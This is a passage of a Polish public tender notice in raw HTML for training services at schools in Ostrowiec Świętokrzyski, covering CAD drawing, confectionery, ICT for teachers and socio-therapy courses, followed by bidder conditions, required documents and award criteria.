dwuwierszowy	ułamki	czcionka / style napisów / treść napisów / wysokość napisów / justyfikacja	podgląd wpisywanego tekstu	zmiana wysokości napisów, zmiana stylu napisów	nowy rodzaj czcionki	tekst pod określonym kątem / tekst w pionie	wpasowanie napisu pomiędzy 2 punkty	sprawdzanie pisowni	paragraf tekstowy / kolor / szerokość / czcionka / granice	Blok – 5h	tworzenie nowego bloku, usuwanie i modyfikacja bloku	wstawianie bloku, biblioteka bloków	nazwa bloku, odbicie lustrzane, punkt wstawiania	bloki o różnych kolorach i typach linii	podgląd przed wstawieniem bloku	odzyskiwanie obiekty po wstawieniu do bloków	wykorzystanie bloku przy tworzeniu innych rysunkówKreskowanie 	Wybór obszaru do kreskowania	Wybór wzoru kreskowania	Podgląd kreskowania	Skala	Dziedziczenie parametrów kreskowania	Multilinia / jak utworzyć styl multilinii / jak sterować końcówkami multilinii	Modyfikacja multiliniiDrukowanie 	Podgląd wydruku	Ustawienie urządzenia drukującego – Konfiguracja plotera	Edytor konfiguracji urządzenia drukującego	Arkusze i rzutnie	Kreśl do plikuRysunek izometryczny Wprawki, testy, bardziej zaawansowane przykłady Uczestnicy szkolenia przystąpią do egzaminu kompetencji przeprowadzonego przez prowadzącego. Po zdanym egzaminie uzyskają certyfikat kompetencji wydany przez Zamawiającego.Zamawiający ponosi koszty ubezpieczenia NNW uczestników, poczęstunku (obiad), pendrive’ów. Harmonogram zajęć powinien obejmować 7 dni zajęć z uwzględnieniem, że uczestnikami kursu są uczniowie szkoły .Zamawiający zapewnia komputery z oprogramowaniem niezbędnym do przeprowadzenia szkolenia. 5)	Część 5 zamówienia pn. „Kurs CUKIERNIK”Cel: przygotowanie uczestników (uczniów) do uzyskania kwalifikacji w zawodzie Cukiernik, zakończony egz. czeladniczym, po pozytywnym zdaniu egz. Uczestnicy otrzymują kwalifikacje w zawodzie cukiernik (świadectwo czeladnicze). •	Liczba godzin: nie mniej niż :180 h, 80 h teorii; 100 h praktyki,•	Termin realizacji: luty – czerwiec 2020 r., w terminach ustalonych z Zamawiającym,•	Liczba osób: 10•	Miejsce realizacji: Ostrowiec Świętokrzyski, osiedle Słoneczne 48, zajęcia realizowane poza godzinami lekcyjnymi z uwzględnieniem, że uczestnikami kursu będą uczniowie Specjalnego Ośrodka Szkolno-Wychowawczego.•	Wymagane zagadnienia do omówienia z uczestnikami: 	Program szkolenia:1. Wyposażenie stanowiska pracy, organizacja stanowiska pracy; terminologia stosowana w cukiernictwie: •narzędzia, maszyny i urządzenia wykorzystywane w pracy2. Podstawowe zagadnienia z zakresu bhp, ppoż. oraz pierwszej pomocy3. Wymogi systemu HACCP w gastronomii,4.Procesy technologiczne stosowane w produkcji żywności: •prawidłowa obróbka wstępna i termiczna produktów spożywczych dla zachowania ich walorów smakowych i bezpiecznego przechowywania, •zasady racjonalnego doboru surowców i ich maksymalnego wykorzystania w kuchni, •techniki rozpoznawania przydatności surowców do produkcji5. Surowce i materiały pomocnicze stosowane w cukiernictwie - sposoby doboru surowców do poszczególnych wyrobów	Część praktyczna- warsztaty cukiernicze, sporządzanie różnych rodzajów ciast i wyrobów cukierniczych czyli: praktyczne zastosowanie procesów technologicznych w cukiernictwie1. Kruche ciasta: •podstawowe i słone, •ciasto półkruche, •kruche ciasteczka, •do spodów, serników lub szarlotek lub babeczek lub lekkich tart2. Ciasta ucierane3. Ciasta biszkoptowe: •biszkopty jako podstawy do innych ciast, ciastka korpusowe; •wykorzystanie ciasta biszkoptowego do produkcji różnych wyrobów: m.in. rolady, krajanki tortowe4. Kremy lub pianki, musy, mleczka oraz panna cotta: •sekrety udanych kremów5. Serniki: •sernik tradycyjny, •sernik na zimno6. Przygotowanie i podstawy pracy z karmelem7. Flan lub crème brûlée8. Podstawy pracy z czekoladą: •tajniki i techniki pracy z czekoladą, •polewy i ozdoby czekoladowe9. Torty na bazie ciast biszkoptowych + dekoracja10. Cupcake lub muffiny + dekoracja11. Pierniki lub pierniczki i keksy12. Cake popsy lub bajaderki, nugaty13. Podstawy Dekorowania: •wykorzystanie barwników, masy marcepanowej, lukrów plastycznych i innych, •dekorowanie, m.in. kremami, czekoladą, lukrem plastycznym, •informacje o różnych rodzajach mas plastycznych, •użycie barwników spożywczych z lukrem i masą cukrową, •użycie dekoracji i tworzenie tortów piętrowych14. Beza i makaroniki + dodatki15. Faworki i pączki16. Ciasta drożdżowe, makowce, strudle17. Najnowsze trendy w wyrobach cukierniczych: •ekspozycja i aranżacja18. Zarządzanie lokalem gastronomicznymZe względu na to, iż uczestnikami kursu są osoby niepełnosprawne, prowadzący zobowiązany jest posiadać kwalifikacje w zakresie oligofrenopedagogiki. Zamawiający ponosi koszty: ubezpieczenia NNW uczestników, poczęstunku (obiad), podręczników, egzamin czeladniczy, poczęstunek (obiad), odzież roboczą, materiały do zajęć praktycznych i materiały dydaktyczne. Harmonogram zajęć powinien obejmować 30 dni zajęć.Uczestnicy otrzymują certyfikat potwierdzający ukończenie szkolenia, wydany przez Zamawiającego oraz świadectwo czeladnicze w zawodzie cukiernik. 6)	Część 6 zamówienia pn. „Szkolenie TIK”Celem szkolenia jest doskonalenie kompetencji nauczycieli ZS nr 3 w Ostrowcu Św. w zakresie wykorzystania w nauczaniu przedmiotów zawodowych technologii informacyjno-komunikacyjnych sprzyjających kształtowaniu u uczniów kompetencji kluczowych oraz umiejętności uniwersalnych niezbędnych na rynku pracy oraz realizacji nauczania w nowoczesny i atrakcyjny sposób · Liczba godzin: 20 · Termin realizacji: I.2020-XII.2020, w terminach ustalonych z Wnioskodawcą· Liczba osób: 10 · Miejsce realizacji: Ostrowiec Świętokrzyski, ZS nr 3, ul. Sandomierska 2· Wymagane zagadnienia do omówienia z uczestnikami:- Szkolenie przygotowuje uczestników do wykorzystywania technologii informacyjnej i komunikacyjnej w pracy nauczyciela. Obejmuje zagadnienia z zakresu prawnych, etycznych, społecznych i ekonomicznych aspektów rozwoju i zastosowań technologii informacyjnej i komunikacyjnej, nauki i pracy w środowisku technologii, w tym znajomości aplikacji stosowanych w nauczanym przedmiocie, korzystania z zasobów i podstawy pracy na platformie edukacyjnej.Uczestnicy szkolenia przystąpią do egzaminu kompetencji, który zostanie przeprowadzony przez prowadzącego. Po zdanym egzaminie uzyskają certyfikat kompetencji wydany przez Zamawiającego. Zamawiający wydaje certyfikaty dotyczące udziału w szkoleniu. Zamawiający zapewnia komputery z oprogramowaniem, tablice interaktywne, projektowy multimedialne i inny sprzęt niezbędny do przeprowadzenia szkolenia.7)	Część 7 zajęcia z Socjoterapii - zajęcia grupowe w SOSW Zajęcia z uczniami szkoły.Celem zajęć jest rozwiązywanie problemów uczniów Szkoły Branżowej I Stopnia Specjalnej w Specjalnym Ośrodku Szkolno-Wychowawczym w relacjach interpersonalnych, przepracowanie/korekcja sądów o rzeczywistości. Liczba godzin: 15 spotka n x 4h, łącznie 60 h Przewiduje się możliwość innej organizacji zajęć celem dostosowania harmonogramu spotkań do potrzeb uczestników.· Termin realizacji: II.2020-VI.2020, w terminach ustalonych z Wnioskodawcą· Liczba osób: 10· Miejsce realizacji: Ostrowiec Świętokrzyski, os. Słoneczne 48· Program zajęć umożliwia realizacje następujących celów: Cele terapeutyczne dotyczą głównie:- odreagowania emocji,- rozwiązywania problemów, trudnych sytuacji,- lepszego zrozumienia ludzkich zachowań,- otrzymywania wsparcia od grupy,- przyjmowania i dawania informacji zwrotnych,- poznania i nazywania własnych emocji. Cele edukacyjne dotyczą przede wszystkim:- uczenia stawiania granic, odmawiania,- przełamywania nieśmiałości,- uczenia radzenia sobie w sytuacjach stresowych,- uczenia nawiązywania kontaktów,- umiejętności wyrażania swoich uczuć,- umiejętności wytyczania celu,- umiejętności podejmowania samodzielnych decyzji i brania za nie odpowiedzialności,- wyszukiwania zainteresowań, własnych możliwości i predyspozycji,- uczenia tolerancji i akceptacji drugiego człowieka,- uczenia współpracy i współdziałania.Cele rozwojowe dotyczą głównie:- poznania samego siebie,- poznania swoich mocnych i słabych stron,- poznania swoich talentów, zdolności,- budowania poczucia własnej wartości,- doskonalenia umiejętności zachowań asertywnych,- kształtowania inteligencji emocjonalnej - rozpoznawanie, nazywanie emocji i uczuć,- doskonalenie informacji zwrotnych. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">80000000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>80530000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>80531000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>80510000-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-06-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna, że Wykonawca spełnia warunek szczegółowy w zakresie posiadania zdolności technicznej lub zawodowej, jeżeli wykaże, że:	dysponuje co najmniej jedną osobą (trenerem/instruktorem) skierowanym do realizacji przedmiotowego zamówienia i odpowiedzialną za prowadzenie zajęć/kursu, z wykształceniem wyższym lub zawodowym adekwatnym do tematyki czynności wykonywanych w ramach kursu/zajęć lub certyfikatem/zaświadczeniem umożliwiającym przeprowadzenie danych czynności w ramach kursu/zajęć, oraz z doświadczeniem zawodowym tj. przeprowadzeniem co najmniej jednego kursu/ zajęć z zakresu odpowiadającego czynnościom wykonywanym w ramach kursu/zajęć.Trenerzy/instruktorzy powinni posiadać wykształcenie wyższe lub zawodowe adekwatne do tematyki kursu/zajęć lub certyfikaty/zaświadczenia umożliwiające przeprowadzenie danego kursu/zajęć, w przypadku zadania 5 i 7 wymagane jest posiadanie wykształcenia z zakresu oligofrenopedagogiki, w zakresie zadania 7 wymagane aby prowadzący posiadał dodatkowo studia pedagogiczne o specjalizacji socjoterapia lub pedagogika resocjalizacyjna lub pokrewna specjalność lub studia podyplomowe albo kurs zawodowy w zakresie socjoterapii lub resocjalizacji.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">aktualne na dzień„ składania ofert oświadczenie dotyczące przesłanek wykluczenia wg wzoru – załącznik nr 2, oświadczenie o niezaleganiu z opłaceniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991r. o podatkach i opłatach lokalnych, wg wzoru - załącznik nr6 </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykonawca składa: aktualne na dzień składania ofert oświadczenie dotyczące spełnienia warunków udziału‚ w postępowaniu według wzoru jak w załączniku nr 3 do SIWZ </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">1. Formularz oferty€“ załącznik Nr 1 do SIWZ 2. Podpisany projekt umowy- załącznik Nr 7 do SIWZ. 3. Dokument z, którego wynika prawo do podpisania oferty lub innych dokumentów składanych z ofertą…, chyba ze Zamawiający może je uzyskać‡ w szczególności za pomocą… bezpłatnych i ogólnodostępnych baz danych a Wykonawca wskaże‚ ten fakt w składanej ofercie. 4. Zgodnie z art. 24 ust. 11 ustawy wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji dotyczących kwoty, jaką… zamierza przeznaczyc‡ na sfinansowanie zamówienia, firm oraz adresów Wykonawców, którzy ‚złożyli oferty w terminie, ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach, przekazuje zamawiającemu ›oświadczenie o przynależności lub braku › przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić‡ dowody, że powiązania z innym Wykonawcą… nie prowadzą… do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy stanowi załącznik nr 5 do SIWZ. 5. wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami. załącznik nr 4. </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Oświadczenie RODO (załącznik nr 8)</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>0,60</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie trenera/instruktora</TD><TD style='border: 1px solid black;border-collapse: collapse;'>0,40</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat 